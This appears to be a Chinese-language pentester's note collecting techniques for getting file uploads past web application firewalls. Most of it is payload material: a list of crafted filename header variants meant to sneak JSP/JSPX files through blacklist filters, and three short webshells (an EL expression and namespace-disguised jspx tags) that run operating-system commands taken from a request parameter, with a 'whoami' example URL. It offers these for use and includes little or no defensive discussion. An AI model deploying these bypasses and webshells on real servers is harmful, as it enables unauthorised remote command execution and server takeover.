文件上传绕过waf姿势收集

前言

现在渗透测试基本都会遇到waf，有waf就会封ip，有waf就要fuzz,记录一下从网上收集到的常用的文件上传的姿势，不一定能用，说不定下次就遇到了呢。

正文

后缀绕过

白名单基本没戏，洗洗睡吧。记录一下遇到的黑名单绕过。

jsp

• 1.jpg\.jsp/
  以下内容可以尝试换行试一下
• filename=’shell.jspx.jsp’
• filename=shell.jspx.jsp
• filename=shell.jspx.jsp’
• “filename”=shell.jspx;
• filename=shell.jpg;filename=shell.jspx;
• filename=shell.jspx;filename=shell.jpg;
• FileName=shell.jspx.jsp’
• FileName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaashell.jspx.jsp’
• FileName =shell.jspx（加空格）
• filename====”shell.jspx.jsp1”（加等号）
• FileName =shell.jspx
• FileName=shell.jspx.
  jsp
• File
  Name=shell.jspx.jsp’

内容绕过

jsp利用EL表达式绕过

${Runtime.getRuntime().exec(request.getParameter("x"))}

jspx利用命名空间绕过:http://127.0.0.1:8080/test.jsp?ccadmin=whoami,其中bbb可以任意替换

<bbb:root xmlns:bbb="http://java.sun.com/JSP/Page" version="1.2">
    <bbb:scriptlet>
    Runtime.getRuntime().exec(request.getParameter("ccadmin"));    
</bbb:scriptlet>>
</bbb:root>

jspx利用jsp:expression绕过

<bbb:root xmlns:bbb="http://java.sun.com/JSP/Page" version="1.2">
    <bbb:expression>
    Runtime.getRuntime().exec(request.getParameter("ccadmin"))
</bbb:expression>
</bbb:root>

参考内容

• https://xz.aliyun.com/t/10515
• https://yzddmr6.com/posts/jsp-webshell-upload-bypass/